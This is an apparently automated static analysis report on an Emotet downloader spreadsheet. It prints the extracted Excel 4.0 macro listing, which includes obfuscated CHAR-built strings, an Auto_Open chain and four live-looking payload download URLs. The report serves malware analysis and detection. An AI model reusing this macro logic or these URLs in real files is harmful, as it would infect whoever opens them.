Malicious Office (OLE) / .XLS — malware analysis report

Static analysis result for SHA-256 c283869d07cbb37a…

MALICIOUS

Office (OLE) / .XLS

216.5 KB Created: 2015-06-05 18:19:34 Authoring application: Microsoft Excel First seen: 2026-06-16
MD5: 2aaf3c4e966e508931b1479d98578abd SHA-1: df424378c0bcd742055f529128de7bceefb9dc5a SHA-256: c283869d07cbb37a68042d209520bce57f1e450808babf661f62db8c90d7ce9f
200 Risk Score

Heuristics 4

  • ClamAV: Xls.Downloader.Emotet-b649c93692b4c9d9-9976616-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Downloader.Emotet-b649c93692b4c9d9-9976616-0
  • Excel 4.0 Auto_Open defined name critical OLE_XLM_AUTOOPEN_DEFINEDNAME
    oletools recovered an Auto_Open / Auto_Close entry from an Excel 4.0 macro sheet. The raw BIFF name can be tokenized or partially opaque to byte-string checks, but the recovered macro listing confirms the workbook has an XLM auto-execution entry.
  • XLM Auto_Open with dangerous formula APIs critical OLE_XLM_DANGEROUS_FN
    Excel 4.0 macro sheet contains an Auto_Open / Auto_Close entry and dangerous XLM formula APIs that can invoke programs, write files, or transfer control without VBA.
  • Excel 4.0 (XLM) macro sheet present medium OLE_XLM_AUTOOPEN
    Workbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
xlm_macros.txt xlm-macro oletools.olevba.extract_all_macros (XLM macro listing) 8189 bytes
SHA-256: 1c4ca3ac7a958ad30d20e2cbe71ce64d8944a312564cef26f4a1a0bcd74ec445
Preview script
First 1,000 lines of the extracted script
' 0085     13 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible -  Shee
' 0085     14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, hidden -  Sheet
' 0085     14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, hidden -  Sheet
' 0085     14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, hidden -  Sheet
' 0085     14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, hidden -  Sheet
' 0085     14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, hidden -  Sheet
' 0085     14 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, hidden -  Sheet
' 0018     29 LABEL : Cell Value, String Constant - _xlfn.SINGLE hidden len=2 ptgErr  *INCOMPLETE FORMULA PARSING* Remaining, unparsed expression: b'\x1d'
' 0018     58 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open len=7 ptgRef3d  Sheet!G3 
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' Sheet,Reference,Formula,Value
'  Sheet,E2,CHAR(216/2),""
'  Sheet,K2,CHAR(35*2),""
'  Sheet,S2,CHAR(100-35),""
'  Sheet,B3,CHAR(236-118),""
'  Sheet,I3,CHAR(238/2),""
'  Sheet,O3,CHAR(134/2),""
'  Sheet,U3,"",5.00000000000000000000
'  Sheet,A4,CHAR(228/2),""
'  Sheet,M4,CHAR(148/2),""
'  Sheet,Q4,"",1.00000000000000000000
'  Sheet,T4,CHAR(42*2),""
'  Sheet,J5,CHAR(52*2),""
'  Sheet,S5,CHAR(100/2),""
'  Sheet,D6,CHAR(185-110),""
'  Sheet,Q6,CHAR(220-111),""
'  Sheet,L7,CHAR(170/2),""
'  Sheet,V7,CHAR(224/2),""
'  Sheet,G8,CHAR(109-40),""
'  Sheet,M8,CHAR(200-100),""
'  Sheet,P8,CHAR(232/2),""
'  Sheet,T9,CHAR(194/2),""
'  Sheet,F10,CHAR(203-102),""
'  Sheet,K10,CHAR(164-82),""
'  Sheet,B11,CHAR(220/2),""
'  Sheet,H11,"",4.00000000000000000000
'  Sheet,O11,CHAR(96/2),""
'  Sheet,Q11,CHAR(136/2),""
'  Sheet,H13,CHAR(166/2),""
'  Sheet,L13,CHAR(33*2),""
'  Sheet,S13,CHAR(210/2),""
'  Sheet,E14,CHAR(240-120),""
'  Sheet,F14,"",3.00000000000000000000
'  Sheet,N14,CHAR(217-100),""
'  Sheet,P15,CHAR(202-103),""
'  Sheet,C16,CHAR(206-103),""
'  Sheet,M16,CHAR(152-76),""
'  Sheet,T16,CHAR(242/2),""
'  Sheet,R17,CHAR(212-101),""
'  Sheet,O18,CHAR(230/2),""
'  Sheet,U21,"",1.00000000000000000000
'  Sheet,F28,CHAR(32),""
'  Sheet,R3,T( Shee!S2& Shee!F24& Shee!F26& Shee!F24& Shee!M4& Shee!M4& Shee!O3& Shee!O3& Shee!L13& Shee!L13& Shee!F24),""
'  Sheet,F6,T( Shee!L30& Shee!F24& Shee!N14& Shee!A4& Shee!E2& Shee!Q6& Shee!R17),""
'  Sheet,N19,T( Shee!B11& Shee!F24& Shee!F26& Shee!F24& Shee!L7& Shee!K10& Shee!M16& Shee!Q11& Shee!R17& Shee!I3& Shee!B11& Shee!E2& Shee!R17& Shee!T9& Shee!M8& Shee!T4& Shee!R17& Shee!K2& Shee!S13& Shee!E2),""
'  Sheet,F26,T( Sheet!H10& Sheet!H14& Sheet!E21),""
'  Sheet,I27,T( Sheet!L10& Sheet!L14& Sheet!E21),""
'  Sheet,G28,T( Sheet!J10& Sheet!J14& Sheet!E21),""
'  Sheet,J29,T( Sheet!N10& Sheet!N14& Sheet!E21),""
'  Sheet,D5,T("System32\"),""
'  Sheet,L8,T( Shee!F28& Shee!H28& Shee!H28& Shee!H26),""
'  Sheet,R13,T( Shee!H28& Shee!H28& Shee!H26),""
'  Sheet,J14,T( Shee!F10& Shee!C16& Shee!O18& Shee!B3),""
'  Sheet,F19,T(":\Windows\"),""
'  Sheet,M26,T( Shee!F24& Shee!F26& Shee!O11& Shee!F26& Shee!O11& Shee!L31),""
'  Sheet,C32,T( Shee!F14& Shee!S5& Shee!H28& Shee!F10& Shee!E14),""
'  Sheet,H7,"",1.00000000000000000000
'  Sheet,J7,"",2.00000000000000000000
'  Sheet,L7,"",3.00000000000000000000
'  Sheet,N7,"",4.00000000000000000000
'  Sheet,H10,"['"://helpeve.com/multiw"', 'TEXT(56656436466735.00000000000000000000)']",""
'  Sheet,J10,"['"://hsweixintp.com/wp-adm"', 'TEXT(144552434315.00000000000000000000)']",""
'  Sheet,L10,"['"://9hym.com/images/SXVI"', 'TEXT(432331536243.00000000000000000000)']",""
'  Sheet,N10,"['"://yuanliao.raluking.com/over"', 'TEXT(574354525236.00000000000000000000)']",""
'  Sheet,H14,"['"p/cxpkaAkAKPRUs4KL/"', 'TEXT(7656364755466430.00000000000000000000)']",""
'  Sheet,J14,"['"in/3c2etiFC2RwmHfTS/"', 'TEXT(5754235354625.00000000000000000000)']",""
'  Sheet,L14,"['"e4tbJw8ZCfa4TEt/"', 'TEXT(464253243255325.00000000000000000000)']",""
'  Sheet,N14,"['"emotionality/Vfc9v1ebcmaEguw/"', 'TEXT(645422525431.00000000000000000000)']",""
'  Sheet,E21,T( Shee!F24& Shee!F26& Shee!F24),""
'  Sheet,J3,T( Shee!R17& Shee!E14& Shee!B11& Shee!B3& Shee!F14& Shee!H28& Shee!R17& Shee!R17& Shee!P15& Shee!P15& Shee!E14& Shee!E14),""
'  Sheet,E9,T( Shee!R17& Shee!E14& Shee!B11& Shee!B3& Shee!Q4& Shee!H28& Shee!R17& Shee!R17& Shee!P15& Shee!P15& Shee!E14& Shee!E14),""
'  Sheet,L12,T( Shee!R17& Shee!E14& Shee!B11& Shee!B3& Shee!H11& Shee!H28& Shee!R17& Shee!R17& Shee!P15& Shee!P15& Shee!E14& Shee!E14),""
'  Sheet,G15,T( Shee!R17& Shee!E14& Shee!B11& Shee!B3& Shee!S5& Shee!H28& Shee!R17& Shee!R17& Shee!P15& Shee!P15& Shee!E14& Shee!E14),""
'  Sheet,Q21,T( Shee!F26& Shee!O11& Shee!F26& Shee!F24& Shee!I15& Shee!P8& Shee!P8& Shee!G17),""
'  Sheet,G13,"FORMULA( Shee!L24& Shee!L26& Shee!L27& Shee!L28& Shee!L28& Sheet!F6& Sheet!N19& Shee!F10& Sheet!R3& Sheet!Q21& Sheet!F26& Sheet!R13& Sheet!E9& Sheet!M26,G16)=FORMULA( Shee!L24& Shee!G8& Shee!F4& Shee!G8& Shee!L26& Shee!L30& Shee!F24& Shee!L26& Sheet!F19& Sheet!D5& Shee!A4& Sheet!J14& Shee!A4& Sheet!C32& Shee!F10& Sheet!P21& Sheet!L8& Sheet!E9& Shee!F24& Shee!L31,G18)=FORMULA( Shee!L24& Shee!L26& Shee!L27& Shee!L28& Shee!L28& Sheet!F6& Sheet!N19& Shee!F10& Sheet!R3& Sheet!Q21& Sheet!G28& Sheet!R13& Sheet!G15& Sheet!M26,G20)=FORMULA( Shee!L24& Shee!G8& Shee!F4& Shee!G8& Shee!L26& Shee!L30& Shee!F24& Shee!L26& Sheet!F19& Sheet!D5& Shee!A4& Sheet!J14& Shee!A4& Sheet!C32& Shee!F10& Sheet!P21& Sheet!L8& Sheet!G15& Shee!F24& Shee!L31,G22)=FORMULA( Shee!L24& Shee!L26& Shee!L27& Shee!L28& Shee!L28& Sheet!F6& Sheet!N19& Shee!F10& Sheet!R3& Sheet!Q21& Sheet!I27& Sheet!R13& Sheet!J3& Sheet!M26,G24)=FORMULA( Shee!L24& Shee!G8& Shee!F4& Shee!G8& Shee!L26& Shee!L30& Shee!F24& Shee!L26& Sheet!F19& Sheet!D5& Shee!A4& Sheet!J14& Shee!A4& Sheet!C32& Shee!F10& Sheet!P21& Sheet!L8& Sheet!J3& Shee!F24& Shee!L31,G26)=FORMULA( Shee!L24& Shee!L26& Shee!L27& Shee!L28& Shee!L28& Sheet!F6& Sheet!N19& Shee!F10& Sheet!R3& Sheet!Q21& Sheet!J29& Sheet!R13& Sheet!L12& Sheet!M26,G28)=FORMULA( Shee!L24& Shee!G8& Shee!F4& Shee!G8& Shee!L26& Shee!L30& Shee!F24& Shee!L26& Sheet!F19& Sheet!D5& Shee!A4& Sheet!J14& Shee!A4& Sheet!C32& Shee!F10& Sheet!P21& Sheet!L8& Sheet!L12& Shee!F24& Shee!L31,G30)=FORMULA( Shee!L24& Shee!G44& Shee!H46& Shee!J44,G36)",""